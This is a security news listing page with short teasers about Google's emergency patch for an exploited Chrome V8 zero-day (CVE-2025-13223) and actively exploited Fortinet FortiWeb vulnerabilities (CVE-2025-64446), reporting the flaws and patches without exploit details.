Read more →

Exploits, Global Security News

More work for admins as Google patches latest zero-day Chrome vulnerability

For the third time in recent months, Google has found itself scrambling to fix a potentially serious zero-day flaw in the Chrome browser’s V8 JavaScript engine. Addressed on Monday as part of an emergency ‘out-of-band’ patch, the vulnerability identified as CVE-2025-13223 was discovered by Clément Lecigne of Google’s in-house Threat Analysis Group (TAG). At some…

Read more →

Exploits, Global Security News, Security, Vulnerabilities

Fortinet’s silent patch sparks alarm as a critical FortiWeb flaw is exploited in the wild

Security researchers are warning about two critical vulnerabilities in Fortinet’s FortiWeb appliances, now tracked under CVE-2025-64446, being actively exploited in the wild. According to findings published by watchTowr, one flaw allows unauthenticated actors to access internal CGI endpoints via relative path traversal, while the other authentication bypass issue lets them impersonate any administrator by abusing…

Read more →

Breaking News, Exploits, Global Security News, hacking, Security

Google fixed the seventh Chrome zero-day in 2025

Google patched two Chrome flaws, including a V8 type-confusion bug, tracked as including CVE-2025-13223, which was exploited in the wild. Google released Chrome security updates to address two flaws, including a high-severity V8 type confusion bug tracked as CVE-2025-13223 that has been actively exploited in the wild. The Chrome V8 engine is Google’s open-source JavaScript…

Read more →

Exploits, Global Security News

Google Issues Security Fix for Actively Exploited Chrome V8 Zero-Day Vulnerability

Google on Monday released security updates for its Chrome browser to address two security flaws, including one that has come under active exploitation in the wild. The vulnerability in question is CVE-2025-13223 (CVSS score: 8.8), a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could be exploited to achieve arbitrary code execution…

Read more →